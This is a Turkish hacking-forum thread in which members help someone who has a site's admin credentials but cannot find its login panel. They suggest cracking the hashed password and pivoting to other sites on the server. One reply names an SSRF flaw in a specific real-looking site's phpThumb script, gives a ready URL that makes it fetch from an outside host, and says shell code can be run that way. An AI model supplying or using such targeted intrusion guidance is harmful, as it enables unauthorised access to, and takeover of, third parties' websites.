Site hazır admin bilgisi hazır ama paneli bulamadım

da1m0n

Uzman üye
30 Tem 2016
1,715
10
root@da1m0n:~#
Kardeşim her sitenin admin paneli olcak diye bir kaide yok aynısı bana oldu bugün server üzerindeki başka sitelere bak birde bende yanlış biliyor olabilirim ama o şifreyi kırman lazım daha şifre değil herhalde.
 

HACKROOT

Üye
26 Haz 2016
158
81
uid=0(root)
Kardeşim çözsen bile o şifre hexlenmiş açamassın yani fazla zorlama başka sitelere yoğunlaş onda sabit kalma

ama uğraşacağım dersen sana kritik bir bilgisini vereyim

(SSRF)Server side request forgery açığı var dışardan sunucuya dosya dahil edebilirsin ama bilgin yoksa hiç uğraşma biliyorsan bak get ile user agent eklemeleriyle url'yi ise decode edip sonuç alınabilir

örnek;
dosya içerisine bir shell kodu eklenip Thumb'da çalıştırılabilir
http://www.tropicalwings.co.uk/phpthumb/phpThumb.php?h=750&src=http://hit1oYqJRS94X.bxss.me/
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.